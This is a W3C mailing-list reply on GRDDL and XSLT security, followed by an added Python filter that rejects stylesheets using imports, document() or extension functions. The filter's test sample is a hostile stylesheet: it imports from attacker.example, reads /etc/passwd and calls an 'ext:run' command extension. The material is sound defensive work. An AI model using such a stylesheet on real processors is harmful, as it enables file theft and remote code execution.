Re: GRDDL

On Fri 30/04/2004 at 11:58, bry@itnisk.com wrote:
> In the GRDDL note, under Security Considerations, it states: "
> [...]
> Given the expressive power of XSLT, and the 
> possibility to access external resources 
> from a XSLT style sheet (e.g. through the 
> document function or the xsl:import 
> mechanism), implementors should take the 
> appropriate measures to prevent malicious 
> usage of this mechanism."
> 
> This seems to ignore the most dangerous 
> aspect of the technique outlined, that is to 
> say an XSLT that uses extension functions 
> that then calls objects on the server. 

Why does it seem so? Part of the big expressive power of XSLT relies on
its extensions, indeed.

> I'm not exactly sure anyhow what appropriate 
> security measures the implementor should 
> take; is it being suggested that all 
> stylesheets used in this manner should be 
> processed through first to make sure that 
> there are no xsl:imports, xsl:includes, uses 
> of the document function, extension 
> functions, and so forth?

Well, it depends on the XSLT library you use; most of them have a way
to disable extensions, to reduce the scope of the document() function,
etc. Alternatively, you can choose to move the trust consideration one
layer up, and only accept XSLTs with well-known URIs and implemented as
static transformations, or only accept XSLTs from domains that you trust,
etc.
(part of this trust mechanism could be indeed to check that the provided
XSLT doesn't infringe the rules set in the GRDDL spec)

> Given that the 
> model for XSLT usage is a black box this 
> seems to be a difficult-to-manage process. 

I hope not; the GRDDL demonstrator, while not proven 100% safe, is
running online, accepting XSLT from everywhere:
http://www.w3.org/2004/01/rdxh/grddl-xml-demo

The underlying XSLT processor has been made safer by refusing
extensions, restricting the scope of access for the document() function,
etc.

Dom
-- 
Dominique Hazaël-Massieux - http://www.w3.org/People/Dom/
W3C/ERCIM
mailto:dom@w3.org

Received on Monday, 3 May 2004 04:22:13 UTC
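As an added illustration of the "one layer up" check discussed in the reply (whether a submitted stylesheet uses xsl:import/xsl:include, the document() function, or extension elements and functions), here is a standard-library Python pre-filter. It is example code written for this page, not code from the GRDDL demonstrator or the W3C; the two stylesheets are constructed samples, and the namespace urn:example:ext with its ext:run function and ext:shell element are hypothetical.

```python
"""Static pre-check for untrusted XSLT stylesheets (added example, not W3C code).

Rejects a stylesheet that uses xsl:import / xsl:include, calls document(),
or declares/calls extension elements and functions. It parses the stylesheet
as plain XML and never executes it, so it is safe to run on untrusted input.
"""
import io
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
# Function namespaces that belong to XSLT/XPath itself (XSLT 2.0 adds fn: and xs:).
# A prefixed function call resolving to any other namespace is an extension function.
BUILTIN_FUNCTION_NS = {
    XSL_NS,
    "http://www.w3.org/2005/xpath-functions",
    "http://www.w3.org/2001/XMLSchema",
}
# document( not preceded by a name character, so "mydocument(" is not matched;
# a prefixed "ns:document(" is caught by PREFIXED_CALL instead.
DOCUMENT_CALL = re.compile(r"(?<![\w.:-])document\s*\(")
PREFIXED_CALL = re.compile(r"(?<![\w.:-])([A-Za-z_][\w.-]*):([A-Za-z_][\w.-]*)\s*\(")
# XSLT 1.0: extension elements are declared on xsl:stylesheet with
# extension-element-prefixes, or on literal result elements with the
# xsl:extension-element-prefixes attribute.
EXT_PREFIX_ATTRS = ("extension-element-prefixes", "{%s}extension-element-prefixes" % XSL_NS)


def audit_stylesheet(xslt_text):
    """Return a list of (kind, detail) findings; empty means none of the
    mechanisms named in the GRDDL security note are used."""
    findings = []
    ns_stack = [{}]       # prefix -> namespace URI in scope, one dict per nesting level
    extension_ns = set()  # namespace URIs declared as extension-element namespaces
    source = io.BytesIO(xslt_text.encode("utf-8"))
    for event, payload in ET.iterparse(source, events=("start-ns", "end-ns", "start")):
        if event == "start-ns":
            prefix, uri = payload  # default namespace arrives with prefix ""
            ns_stack.append({**ns_stack[-1], prefix: uri})
            continue
        if event == "end-ns":
            ns_stack.pop()
            continue
        elem, in_scope = payload, ns_stack[-1]
        ns, _, local = elem.tag.rpartition("}")
        ns = ns.lstrip("{")
        if ns == XSL_NS and local in ("import", "include"):
            findings.append((local, elem.get("href", "")))
        for attr in EXT_PREFIX_ATTRS:
            for prefix in elem.get(attr, "").split():
                uri = in_scope.get("" if prefix == "#default" else prefix)
                extension_ns.add(uri)
                findings.append(("extension-element-prefixes", "%s -> %s" % (prefix, uri)))
        if ns in extension_ns:
            findings.append(("extension-element", elem.tag))
        # XPath only ever appears in attribute values (select, test, match, AVTs ...),
        # so every attribute of every element is scanned, deny-by-default.
        for value in elem.attrib.values():
            if DOCUMENT_CALL.search(value):
                findings.append(("document", value))
            for prefix, name in PREFIXED_CALL.findall(value):
                uri = in_scope.get(prefix)
                if uri not in BUILTIN_FUNCTION_NS:
                    findings.append(("extension-function", "%s:%s -> %s" % (prefix, name, uri)))
    return findings


def is_acceptable(xslt_text):
    return not audit_stylesheet(xslt_text)


# Constructed sample: a GRDDL-style transform that only reads the input document.
BENIGN_XSLT = """<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:xhtml="http://www.w3.org/1999/xhtml"
    xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
    xmlns:dc="http://purl.org/dc/elements/1.1/">
  <xsl:output method="xml" indent="yes"/>
  <xsl:template match="/">
    <rdf:RDF>
      <rdf:Description rdf:about="">
        <dc:title><xsl:value-of select="//xhtml:title"/></dc:title>
      </rdf:Description>
    </rdf:RDF>
  </xsl:template>
</xsl:stylesheet>"""

# Constructed sample exercising each mechanism; urn:example:ext is a hypothetical
# extension namespace, ext:run and ext:shell are hypothetical extensions.
MALICIOUS_XSLT = """<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:ext="urn:example:ext"
    extension-element-prefixes="ext">
  <xsl:import href="http://attacker.example/base.xsl"/>
  <xsl:template match="/">
    <out>
      <xsl:copy-of select="document('file:///etc/passwd')"/>
      <xsl:value-of select="ext:run('id')"/>
      <ext:shell cmd="id"/>
    </out>
  </xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    print("benign accepted:", is_acceptable(BENIGN_XSLT))
    for kind, detail in audit_stylesheet(MALICIOUS_XSLT):
        print("rejected:", kind, detail)
```

This is a syntactic gate on the stylesheet text, the kind of check the reply suggests could be part of the trust mechanism; it complements rather than replaces the processor-level controls also mentioned (for example, lxml's `etree.XSLTAccessControl` limits file and network access for document() at run time). Because a prefixed function call is treated as an extension unless its namespace is in `BUILTIN_FUNCTION_NS`, the filter rejects by default anything it does not recognise, which is the right failure mode for stylesheets accepted from anywhere.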